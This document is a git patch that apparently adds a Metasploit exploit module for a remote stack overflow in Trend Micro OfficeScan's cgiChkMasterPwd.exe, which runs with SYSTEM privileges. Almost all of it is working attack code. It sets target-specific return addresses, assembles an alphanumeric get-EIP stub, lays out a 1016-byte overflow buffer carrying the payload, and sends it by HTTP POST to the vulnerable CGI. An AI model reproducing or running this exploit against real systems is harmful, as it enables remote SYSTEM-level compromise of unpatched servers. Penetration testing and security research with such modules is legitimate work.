From eabc0b511db2c5d05509420493e0109cb503bbf1 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Sun, 9 Sep 2007 22:56:35 +0000
Subject: [PATCH] New module from toto

git-svn-id: file:///home/svn/framework3/trunk@5099 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../windows/http/trendmicro_officescan.rb     | 100 ++++++++++++++++++
 1 file changed, 100 insertions(+)
 create mode 100644 modules/exploits/windows/http/trendmicro_officescan.rb

diff --git a/modules/exploits/windows/http/trendmicro_officescan.rb b/modules/exploits/windows/http/trendmicro_officescan.rb
new file mode 100644
index 0000000000..9eae7c6f8e
--- /dev/null
+++ b/modules/exploits/windows/http/trendmicro_officescan.rb
@@ -0,0 +1,100 @@
+require 'msf/core'
+require 'metasm'
+
+module Msf
+
+class Exploits::Windows::Http::TrendMicro_OfficeScan_Overflow < Msf::Exploit::Remote
+
+	include Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'Trend Micro OfficeScan Remote Stack Overflow',
+			'Description'    => %q{
+				This module exploits a stack overflow in Trend Micro OfficeScan
+				cgiChkMasterPwd.exe (running with SYSTEM privileges).
+					
+			},
+			'Author'         => [ 'toto' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision: 3636 $',
+			'References'     =>
+				[
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Payload'        =>
+				{
+					'MinNops'  => 0,
+					'MaxNops'  => 0,
+					'Space'    => 498,
+					'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric),
+					# clean up to prevent crash on exit
+					'Prepend' => Metasm::Shellcode.assemble(Metasm::Ia32.new, "mov dword ptr fs:[0], 0").encode_string,
+					'EncoderOptions' =>
+						{
+							'BufferRegister' => 'ECX',
+						},
+					'StackAdjustment' => -3500,
+				},
+			'Platform'       => 'win',
+			'Targets'        => 
+				[
+					# return addresses need to be alphanumeric (here in loadhttp data section)
+					[ 'Windows 2000 - Trend Micro OfficeScan 7.3.0.1293)', { 'Rets' => [0x63613035, 0x63613032] } ],
+				],
+			'DisclosureDate' => 'Jun 28 2007',
+			'DefaultTarget' => 0))
+
+			register_options(
+				[
+					Opt::RPORT(8080),
+				], self.class)
+	end
+
+	def exploit
+		geip_src = "		
+			push esi
+			push esp
+			pop eax
+			xor esi, [eax]
+			push esi
+			pop eax
+			xor eax, got_eip
+			push eax
+			pop ecx
+			got_eip:
+		"
+
+		sc = Metasm::Shellcode.assemble(Metasm::Ia32.new, geip_src)
+	
+		sc.base_addr = target['Rets'][0]
+		get_eip = sc.encode_string
+		
+		pat = Rex::Text.rand_text_alphanumeric(1016)
+
+		pat[0, get_eip.length] = get_eip
+		pat[14, payload.encoded.length] = payload.encoded
+		pat[512, 4] = [target['Rets'][1]].pack('V')    # string pointer (to prevent a crash)
+		pat[524, 4] = [target['Rets'][0]].pack('V')    # sets EIP to the address where the shellcode has been copied
+		pat[540, 4] = [target['Rets'][0]-1].pack('V')  # shellcode will be copied at this address (+1)
+
+		data = "TMlogonEncrypted=!CRYPT!" + pat
+		len = sprintf("%u", data.length);
+
+		print_status("Trying target address 0x%.8x..." % target['Rets'][0])
+
+		res = send_request_cgi({
+			'uri'          => '/officescan/console/cgi/cgiChkMasterPwd.exe',
+			'method'       => 'POST',
+			'content-type' => 'application/x-www-form-urlencoded',
+			'data'         => data,
+		}, 5)
+		
+		handler
+	end
+
+end
+end